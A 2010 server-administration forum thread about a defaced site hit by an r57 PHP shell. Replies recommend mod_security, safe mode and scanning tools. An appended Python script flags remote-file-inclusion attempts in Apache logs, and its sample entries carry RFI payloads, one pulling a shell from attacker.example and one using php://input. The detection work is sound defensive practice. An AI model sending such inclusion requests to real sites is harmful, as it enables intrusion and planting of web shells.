Security question

Discussion in 'Server Operation' started by bernholdt, Jun 23, 2010.

  1. bernholdt

    bernholdt Member

    I experienced a defacing today on one of my sites. Someone managed to get an r57 shell into my site.

    I have modsecurity2, PHP Suhosin and suPHP installed as security precautions.

    What else can I do to protect myself against remote file inclusion?

    I am running Debian Lenny with a perfect server setup, from here

    Any hints or ideas?
    Last edited: Jun 23, 2010
  2. topdog

    topdog Active Member

    A properly configured mod_security should be able to ward off most of those attacks. You could also investigate running PHP in safe mode. The issue with security is that it is a moving target. Keep scanning your applications for security vulnerabilities to keep ahead of the attackers.
  3. bernholdt

    bernholdt Member

    Hi Topdog

    You write "Keep scanning your applications for security vulnerabilities to keep ahead of the attackers". Can you recommend a security scanner which I can use to find any holes in this particular script?
  4. topdog

    topdog Active Member

    Scanning is not just about using automated tools, but good examples are and nessus with the commercial feed.

    You need to subscribe to security vulnerability lists as well, and also do your own application auditing to check applications for XSS, CSRF and other kinds of web vulnerabilities.
  5. Ben

    Ben ISPConfig Developer

    For application scanning you won't be that good with using Nessus or Nikto, even though they can help you as a start.
    It's like doing app pentests, where you have either the choice of doing some kind of black box testing, with automated support (e.g. with Acunetix or similar; Acunetix for at least detecting XSS and crawling is free, and you could combine this with other free tools like Burp that can help to find more when letting Acunetix crawl through the page) and manual tests, versus (manual / automated) code review. For PHP software you could try "rips". I did not use it yet, but the description sounded pretty interesting. sqlmap, for example, is interesting for checking SQL injections... You will find more tools when googling around for the above; OWASP or webappsec (and their mailing list archives) are a good resource pool as well.
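As an added example for the log-review side of this thread (not code from any of the posters or from ISPConfig): a small scanner for Apache combined-format access logs that flags requests whose query parameters carry a remote URL or a PHP stream wrapper, the shape an include()-based remote file inclusion takes. The log lines and host names below are constructed for illustration.

```python
# Added example: flag remote-file-inclusion attempts in Apache combined-format logs.
# The SAMPLE_LOG entries and the host "attacker.example" are constructed placeholders.
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# A parameter value that is itself an absolute URL or a stream wrapper is the
# classic RFI shape: include($_GET['page']) with page=http://host/shell.txt?
REMOTE_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect)://', re.IGNORECASE)


def rfi_parameters(target):
    """Return [(name, value)] for query parameters that point at a remote resource."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_RE.search(v)]


def scan_log(lines):
    """Return one finding dict per request whose query string carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = rfi_parameters(m.group('target'))
        if hits:
            findings.append({
                'ip': m.group('ip'),
                'path': urlsplit(m.group('target')).path,
                'status': int(m.group('status')),
                'params': hits,
            })
    return findings


# Constructed sample: one benign request and two RFI-shaped ones
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jun/2010:10:01:02 +0200] "GET /index.php?page=home HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jun/2010:10:01:05 +0200] "GET /index.php?page=http://attacker.example/r57.txt? HTTP/1.1" 200 9112 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Jun/2010:10:02:14 +0200] "GET /index.php?page=php://input HTTP/1.1" 500 0 "-" "curl/7.19"',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} status={f['status']} params={f['params']}")
```

A 200 status on a flagged request is the one to chase first, since it means the included URL was fetched and executed rather than rejected.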
